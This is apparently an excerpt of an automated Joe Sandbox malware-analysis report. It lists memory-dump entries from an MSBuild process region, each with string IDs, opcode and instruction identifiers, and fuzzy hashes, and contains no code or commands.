                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: .5wq
                                                                                                                                                                                            • API String ID: 0-74813169
                                                                                                                                                                                            • Opcode ID: 6bf259a81d604937dac3725d64be615d6b7ba7e6775ddbe407d739d124506e1d
                                                                                                                                                                                            • Instruction ID: 19b890389206c0fce8c7a869509827f73f62456d301ad0afe12e24bc795917cb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bf259a81d604937dac3725d64be615d6b7ba7e6775ddbe407d739d124506e1d
                                                                                                                                                                                            • Instruction Fuzzy Hash: A352A974E05229CFDB64DF69C994B9DBBB2BB88300F1085E9D409AB254DB35AEC1CF50
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: .5wq
                                                                                                                                                                                            • API String ID: 0-74813169
                                                                                                                                                                                            • Opcode ID: 58929c44a31a91ea7d5248ae18f779e4818a3c9e7e5a055d8b140e46b474b798
                                                                                                                                                                                            • Instruction ID: 0966c8f92904044f5a821846a505395d86ee668dc26487c9fa8b008d1f11bf52
                                                                                                                                                                                            • Opcode Fuzzy Hash: 58929c44a31a91ea7d5248ae18f779e4818a3c9e7e5a055d8b140e46b474b798
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B61B474E0021ADBDB28DF66D950BADBBB2BF88300F10C4A9D809A7658EB355D85DF40
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ca35568d45a6711487d8474ae959c0149f69697307b6814a314ccbfe893f7477
                                                                                                                                                                                            • Instruction ID: 376b880c7d04fe2cb596e454e4fac4ddf378d3f98404c2de0b874f091b4382c6
                                                                                                                                                                                            • Opcode Fuzzy Hash: ca35568d45a6711487d8474ae959c0149f69697307b6814a314ccbfe893f7477
                                                                                                                                                                                            • Instruction Fuzzy Hash: F0A1AB74A05228DFEB64DF24C994B9ABBB2BF49301F1084EAE40DA7254DB319EC1CF51
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2cce36bb27e6c5ddc8ad5f6c7e03f72c1efbfdc90154f05e69600be19a633307
                                                                                                                                                                                            • Instruction ID: b5dffa0c0a19a60a8932ab69035d017f4a300e31641b2d55fe906945f59f830c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cce36bb27e6c5ddc8ad5f6c7e03f72c1efbfdc90154f05e69600be19a633307
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2551BF74A01328DFDB64DF24D994BA9BBB2FF4A305F5085E9E40AA7250CB319E81CF44
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Xcq$Xcq$Xcq$Xcq
                                                                                                                                                                                            • API String ID: 0-2577476577
                                                                                                                                                                                            • Opcode ID: c85eef5422fac0cc6da7578e5f9df4eaa99928c402c064ce584503da868a9ffb
                                                                                                                                                                                            • Instruction ID: c72008a027051ef989f0d76c6fdf60889d5eefc0e2aee2716efac95390b1cde2
                                                                                                                                                                                            • Opcode Fuzzy Hash: c85eef5422fac0cc6da7578e5f9df4eaa99928c402c064ce584503da868a9ffb
                                                                                                                                                                                            • Instruction Fuzzy Hash: D1319634D0931D8BDF699BA8C5603BFBAF6FB89300F1045E9CC46A7244DB308985CB92
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: \;_q$\;_q$\;_q$\;_q
                                                                                                                                                                                            • API String ID: 0-294077808
                                                                                                                                                                                            • Opcode ID: df9d895a7558053cb859f8558571644e9b82a38890ca6fd076e4eb25a393f392
                                                                                                                                                                                            • Instruction ID: 0816bfb4560f1bc228cf500196ec159292cc69296fc7e305ead9f05015555d88
                                                                                                                                                                                            • Opcode Fuzzy Hash: df9d895a7558053cb859f8558571644e9b82a38890ca6fd076e4eb25a393f392
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7501B1727080198F8FB48E2CC4A5A2577EEEF8866031941BAE101CB3B8DA71DC81C740